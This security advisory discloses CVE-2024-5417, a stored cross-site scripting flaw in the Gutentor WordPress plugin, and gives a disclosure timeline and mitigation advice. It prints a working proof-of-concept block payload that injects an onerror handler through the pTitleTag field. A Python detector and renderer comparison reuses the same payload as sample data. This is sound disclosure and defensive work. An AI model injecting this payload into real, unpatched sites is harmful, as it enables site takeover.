CVE-2024-5417 reveals a critical security flaw in the Gutentor plugin, a popular WordPress page builder with over 50,000 installations. This Stored Cross-Site Scripting (XSS) vulnerability enables attackers to inject malicious JavaScript code by exploiting the block embedding process in new posts. The severity of the issue lies in the fact that this vulnerability can be leveraged by a contributor to escalate privileges and create an unauthorized admin account, resulting in full control of the website.
| Field | Value |
| --- | --- |
| CVE | CVE-2024-5417 |
| Plugin | Gutentor < 3.3.6 |
| Severity | High |
| All-time downloads | 1 303 450 |
| Active installations | 50 000+ |
| Publicly published | August 19, 2024 |
| Last updated | August 19, 2024 |
| Researcher | Dmitrii Ignatyev |
| OWASP Top 10 | A7: Cross-Site Scripting (XSS) |
| PoC | Yes |
| Exploit | No |
| References | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5417 ; https://wpscan.com/vulnerability/fb7d6839-9ccb-4a0f-9dca-d6841f666a1b/ |
Timeline

| Date | Event |
| --- | --- |
| May 24, 2024 | Plugin testing and vulnerability detection in the Gutentor plugin were completed |
| May 24, 2024 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| August 19, 2024 | CVE-2024-5417 registered |
Discovery of the Vulnerability
During a routine security assessment, researchers identified a vulnerability in the Gutentor plugin that is triggered when a contributor creates a post containing certain Gutentor blocks. The attack vector is a custom block carrying a specific payload that abuses the plugin's functionality for adding complex layouts and elements to posts.

The attacker injects a crafted block payload through Gutentor's block creation options. The PoC payload, <!-- wp:gutentor/p3 {\"gID\":\"gm704fd15\",\"mPID\":\"25f55996-3ee4-4198-beb2-376e26177ed3\"} -->, manipulates settings for features such as carousels and buttons within the plugin. By embedding malicious JavaScript, such as img src=x onerror=alert(1), the attacker creates a script that executes when the post is viewed by a site administrator. This attack bypasses standard user permissions and can escalate to full site compromise.
Understanding Stored XSS attacks
Cross-Site Scripting (XSS) is a prevalent vulnerability in WordPress due to its extensibility and reliance on third-party plugins like Gutentor. XSS allows attackers to inject and execute malicious code within a website, which can lead to unauthorized actions, theft of sensitive data, or even full control over the website.
Exploiting the Stored XSS Vulnerability
To exploit CVE-2024-5417, an attacker with contributor access creates a new post and embeds a custom Gutentor block with a payload designed to inject malicious JavaScript. The payload manipulates various block options such as carousel settings and button typography, and carries the XSS injection in the pTitleTag field, which executes when the post is rendered.
POC:
<!-- wp:gutentor/p3 {\"gID\":\"gm704fd15\",\"mPID\":\"25f55996-3ee4-4198-beb2-376e26177ed3\"} -->\n<!-- wp:gutentor/p1 {\"gID\":\"25f55996-3ee4-4198-beb2-376e26177ed3\",\"pName\":\"gutentor/p1\",\"p1CarouselOpt\":{\"enable\":true,\"carouselID\":\"gm704fd15\",\"dots\":false,\"dotsT\":false,\"dotsM\":false,\"arrowNext\":\"fas fa-angle-right\",\"arrowsPrev\":\"fas fa-angle-left\",\"arrowsPosition\":{\"desktop\":\"gutentor-slick-a-default\",\"tablet\":\"gutentor-slick-a-default\",\"mobile\":\"gutentor-slick-a-default\"},\"arrows\":true,\"arrowsT\":true,\"arrowsM\":true,\"infinite\":false,\"speed\":300,\"autoplay\":false,\"draggable\":true,\"pauseOnFocus\":true,\"pauseOnHover\":true,\"autoplaySpeed\":3000,\"slideitem\":{\"desktop\":\"3\",\"tablet\":\"3\",\"mobile\":\"2\"},\"slidescroll\":{\"desktop\":\"3\",\"tablet\":\"3\",\"mobile\":\"2\"},\"cmondesktop\":false,\"cmpaddingdesktop\":\"\",\"cmontablet\":false,\"cmpaddingtablet\":\"\",\"cmonmobile\":false,\"cmpaddingmobile\":\"\"},\"pBtnTypography\":{\"fontType\":\"default\",\"desktopFontSize\":16,\"tabletFontSize\":16,\"mobileFontSize\":16,\"textTransform\":\"normal\"},\"q1BtnTypography\":{\"fontType\":\"default\",\"desktopFontSize\":16,\"tabletFontSize\":16,\"mobileFontSize\":16,\"textTransform\":\"normal\"},\"pOnFeaturedCat\":true,\"pTitleTag\":\"img src=x onerror=alert(1)\",\"pAvatarMargin\":{\"type\":\"px\",\"mTop\":\"-45\",\"mLeft\":\"20\"}} /-->\n<!-- /wp:gutentor/p3 -->
CVE-2024-5417 poses a high risk for any WordPress site using Gutentor. With over 50,000 active installations, the potential attack surface is significant. A malicious user could take advantage of this vulnerability to gain unauthorized access to sensitive data, create new admin accounts, or manipulate website content.
Recommendations for Improved Security
To mitigate the risk of CVE-2024-5417, it is crucial for website administrators to immediately update to the latest version of Gutentor, as the plugin developers will likely release a patch addressing this issue. Plugin developers must also ensure that input sanitization is enforced on all blocks and elements, preventing malicious scripts from being injected and executed.
Additionally, WordPress administrators should review and restrict contributor permissions, disabling the ability to create or modify complex block types if not necessary. Implementing a security plugin that detects and blocks XSS attacks can also help mitigate such vulnerabilities. Regular security audits of plugins and themes should be part of a proactive security strategy to prevent similar exploits in the future.
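The following Python example is added to this advisory to illustrate two points above: the detection side (a security scan that parses WordPress block delimiter comments in post content and flags a pTitleTag value that is not a plain tag name) and the developer side (the difference between interpolating a block attribute straight into the tag position and allowlisting it before rendering). It is not Gutentor's code and not the WordPress block parser; the assumption, drawn from the PoC, is that pTitleTag is used as the HTML tag name wrapping the post title. The sample post content, the allowlist and all function names are constructed for this example.

```python
import html
import json
import re

# Matches a WordPress block delimiter comment such as
#   <!-- wp:ns/name {json} /-->   or   <!-- wp:ns/name {json} -->
# Constructed for this example; the real WordPress block grammar is richer.
BLOCK_RE = re.compile(
    r"<!--\s+wp:(?P<name>[a-z][a-z0-9_-]*/[a-z][a-z0-9_-]*)"
    r"(?:\s+(?P<attrs>\{.*?\}))?\s+/?-->",
    re.DOTALL,
)

# Tags a title wrapper may legitimately be rendered as.
# Assumption: an allowlist of the kind a block author would choose; not Gutentor's own list.
ALLOWED_TITLE_TAGS = frozenset({"h1", "h2", "h3", "h4", "h5", "h6", "p", "span", "div"})

# Constructed post content: a p3 wrapper, a p1 block with the PoC-style pTitleTag
# value, and a second p1 block with a harmless tag name.
SAMPLE_POST = (
    '<!-- wp:gutentor/p3 {"gID":"gm704fd15"} -->\n'
    '<!-- wp:gutentor/p1 {"gID":"25f55996","pOnFeaturedCat":true,'
    '"pTitleTag":"img src=x onerror=alert(1)"} /-->\n'
    '<!-- /wp:gutentor/p3 -->\n'
    '<!-- wp:gutentor/p1 {"gID":"gm1","pTitleTag":"h2"} /-->'
)


def parse_blocks(post_content):
    """Return a list of (block name, attribute dict) for every opening block delimiter."""
    blocks = []
    for m in BLOCK_RE.finditer(post_content):
        attrs = json.loads(m.group("attrs")) if m.group("attrs") else {}
        blocks.append((m.group("name"), attrs))
    return blocks


def find_suspicious_title_tags(post_content):
    """Detection: (block name, pTitleTag value) pairs whose value is not an allowed tag name."""
    hits = []
    for name, attrs in parse_blocks(post_content):
        tag = attrs.get("pTitleTag")
        if isinstance(tag, str) and tag.lower() not in ALLOWED_TITLE_TAGS:
            hits.append((name, tag))
    return hits


def render_title_unsafe(title, tag):
    """Vulnerable pattern: the attribute value lands directly in the tag position."""
    return f"<{tag}>{title}</{tag}>"


def render_title_safe(title, tag, default="h3"):
    """Hardened pattern: allowlist the tag name, fall back to a default, escape the text."""
    if isinstance(tag, str) and tag.lower() in ALLOWED_TITLE_TAGS:
        tag = tag.lower()
    else:
        tag = default
    return f"<{tag}>{html.escape(title)}</{tag}>"


if __name__ == "__main__":
    for name, tag in find_suspicious_title_tags(SAMPLE_POST):
        print(f"suspicious pTitleTag in {name}: {tag!r}")
        print("unsafe render:", render_title_unsafe("Post title", tag))
        print("safe render:  ", render_title_safe("Post title", tag))
```

Running the script prints one hit for the gutentor/p1 block, followed by the unsafe render (the attribute becomes an element with an onerror handler) and the safe render (the value is replaced by the default heading tag). The allowlist is the essential control: escaping alone cannot help when the attacker-controlled value is the tag name itself rather than text inside it.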
By taking proactive measures to address Stored XSS vulnerabilities like CVE-2024-5417, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
ARTYOM K.